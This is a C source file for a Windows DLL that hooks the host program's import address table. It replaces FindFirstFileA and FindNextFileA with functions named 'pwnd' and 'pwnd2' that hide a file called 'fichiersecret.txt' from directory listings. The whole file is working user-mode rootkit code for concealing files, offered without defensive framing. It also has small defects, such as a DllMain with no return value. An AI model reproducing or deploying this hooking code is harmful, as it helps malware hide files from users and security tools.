#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
LPDWORD RetourneAddressFunctionAHook(char* FonctionAHook);
void PoseHookIAT(char* FonctionAHook , LPDWORD NouvelleAddrFunct);
HANDLE WINAPI pwnd(LPCTSTR lpFileName,LPWIN32_FIND_DATA lpFindFileData);
BOOL WINAPI pwnd2(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData);


BOOL APIENTRY DllMain (HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) // Point d'entré dll -> http://msdn2.microsoft.com/en-us/library/ms682583.aspx.
{
    if(dwReason == DLL_PROCESS_ATTACH)
    {
        PoseHookIAT("FindFirstFileA" ,(LPDWORD)&pwnd);
        PoseHookIAT("FindNextFileA" , (LPDWORD)pwnd2);
    }
}



void PoseHookIAT(char* FonctionAHook , LPDWORD NouvelleAddrFunct)
{
    LPDWORD addrFunctAHook = RetourneAddressFunctionAHook(FonctionAHook);
    DWORD accessProtectionValue , accessProtec;

    int vProtect = VirtualProtect(addrFunctAHook,sizeof(LPDWORD),PAGE_EXECUTE_READWRITE,&accessProtectionValue);
    *addrFunctAHook = (DWORD)NouvelleAddrFunct;
    vProtect = VirtualProtect(addrFunctAHook,sizeof(LPDWORD),accessProtectionValue,&accessProtec);
}

HANDLE WINAPI pwnd(LPCTSTR lpFileName,LPWIN32_FIND_DATA lpFindFileData)
{
    HANDLE handleRetour = FindFirstFile(lpFileName,lpFindFileData);
    if(!strcmp(lpFindFileData->cFileName,"fichiersecret.txt"))
    {
        FindNextFile(handleRetour,lpFindFileData);
    }
    return handleRetour;
}

BOOL WINAPI pwnd2(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData)
{
    if(FindNextFile(hFindFile,lpFindFileData))
    {
        if(!strcmp(lpFindFileData->cFileName,"fichiersecret.txt"))
        {
            if(FindNextFile(hFindFile,lpFindFileData))
                return 1;
            return 0;
        }
        return 1;
    }
    else
    {
        return 0;
    }
}

LPDWORD RetourneAddressFunctionAHook(char* FonctionAHook)
{
    HANDLE hdlExecutable = GetModuleHandle(NULL);
    if(hdlExecutable == NULL)return 0;

    PIMAGE_DOS_HEADER structPe = (PIMAGE_DOS_HEADER)hdlExecutable;
    if(structPe->e_magic != IMAGE_DOS_SIGNATURE)return 0;

    PIMAGE_NT_HEADERS structHeaderPe = (PIMAGE_NT_HEADERS)(structPe->e_lfanew + (DWORD)structPe);
    PVOID ptrImgDirecto = (PVOID)structHeaderPe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    PIMAGE_IMPORT_DESCRIPTOR ptrImportDesc =  (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)ptrImgDirecto + (DWORD)structPe);
    while(*(PDWORD)ptrImportDesc != 0)
    {
        PIMAGE_THUNK_DATA32 imgThunk = (PIMAGE_THUNK_DATA32)(ptrImportDesc->OriginalFirstThunk + (DWORD)structPe);
        PIMAGE_THUNK_DATA32 structAddrFu = (PIMAGE_THUNK_DATA32)(ptrImportDesc->FirstThunk + (DWORD)structPe);
        while(*(PDWORD)imgThunk != 0)
        {
            PIMAGE_IMPORT_BY_NAME nameImg = (PIMAGE_IMPORT_BY_NAME)(imgThunk->u1.AddressOfData + (DWORD)structPe);
            if(!strcmp(nameImg->Name,FonctionAHook))
            {
                return &(structAddrFu->u1.Function);
            }
            imgThunk ++;
            structAddrFu++;
        }
        ptrImportDesc++;
    }
    return 0;
}